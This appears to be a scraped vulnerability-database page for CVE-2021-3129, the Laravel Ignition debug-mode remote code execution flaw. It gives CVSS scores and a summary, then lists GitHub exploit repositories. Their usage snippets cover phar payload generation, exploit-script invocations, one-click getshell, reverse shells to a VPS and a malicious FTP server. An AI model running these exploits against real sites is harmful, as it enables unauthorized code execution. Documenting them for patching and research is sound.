7.5
CVSSv2

CVE-2021-3129

Published: 12/01/2021 Updated: 06/04/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Ignition prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote malicious users to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel prior to 8.4.2.

Most Upvoted Vulmon Research Post

laravel debug mode rce | CVE-2021-3129 PoC Exploit is here: https://www.exploit-db.com/exploits/49424

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

facade ignition

Mailing Lists

Ignition versions prior to 252, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents() This is exploitable on sites using debug mode with Laravel versions prior to 842 ...

Github Repositories

CVE-2021-3129 Laravel <= v842 debug mode: Remote code execution (CVE-2021-3129) 修改了@crisprss师傅的 githubcom/crisprss/Laravel_CVE-2021-3129_EXP 增加了更多可用的 gadget 用于遍历 Use: python3 exppy 1204812163:8888 效果: zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exppy 127001:8888 [*] Try t

Laravel debug rce

CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把envexample复制到env作用是开启debug环境 关闭了phpini的pharreadonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web

CVE-2021-3129

CVE-2021-3129 CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞 影响版本及条件 Laravel <= 842 Ignition <252 环境搭建 docker pull vulhub/laravel:842 exp使用 在exploitpy同目录下下载执行 git clone githubcom/ambionics/phpggcgit python3 exploitpy 127001:80 "whoami"

CVE-2021-3129 影响范围 Laravel <= 842 Ignition <252 environment 注意必须放在phpggc的目录下运行,且要有php-cli环境 usage python3 exppy url vps_ip vps_port 直接在vps上接受shell即可

evil_ftp 本脚本配合CVE-2021-3129 laravel debug rce食用更佳 运行上述脚本,一个恶意ftp服务就起来了(注释已经很详细了) 这个脚本做的事情很简单,就是当客户端第一次连接的时候返回我们预设的payload 当客户端第二次连接的时候将客户端的连接重定向到127001:9000,也就是我们的php-fpm服务的端

Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129 Details: wwwambionicsio/blog/laravel-debug-rce Usage $ php -d'pharreadonly=0' /phpggc --phar phar -o /tmp/exploitphar --fast-destruct monolog/rce1 system id $ /laravel-ignition-rcepy localhost:8000/ /tmp/exploitphar Log file: /work/pentest/laravel/laravel/storage/logs/laravellog Logs cleared Successfu

laravel-CVE-2021-3129-EXP CVE-2021-3129 一键 getshell 用法 python3 laravel-CVE-2021-3129-EXPpy 127001:8000 成功以后使用哥斯拉链接即可。

Exploit for CVE-2021-3129

CVE-2021-3129-exploit Exploit for CVE-2021-3129 Lab setup: $ git clone githubcom/laravel/laravelgit $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==251 $ php artisan serve Usage: $ git clone githubcom/nth347/exploit-CVE-2021-3129git $ cd exploit-CVE-2021-3129 $ chmod +x exploitpy $ /exploitpy localhost:

Laravel_CVE-2021-3129_EXP

Laravel-842-rce-CVE-2021-3129 exploitpy test use python3,and only working with phpggc

CVE-2021-3129_exploit Exploit for CVE-2021-3129 Lab setup: $ git clone githubcom/laravel/laravelgit $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==251 $ php artisan serve Usage: $ git clone githubcom/nth347/CVE-2021-3129_exploitgit $ cd CVE-2021-3129_exploit $ chmod +x exploitpy $ /exploitpy localhost:

此项目将不定期从棱角社区对外进行公布一些最新漏洞。

Vulnerability 纪念我们始终热爱的 来人皆是朋友 去人也不留 © Edge Security Team Anchor CMS 0127 跨站请求伪造(CVE-2020-23342) Apache Kylin API未授权访问漏洞(CVE-2020-13937) Apache NiFi Api 远程代码执行(RCE) Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875 CISCO ASA任意文件读取漏洞 (CVE-2020-3452) CNVD-20

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-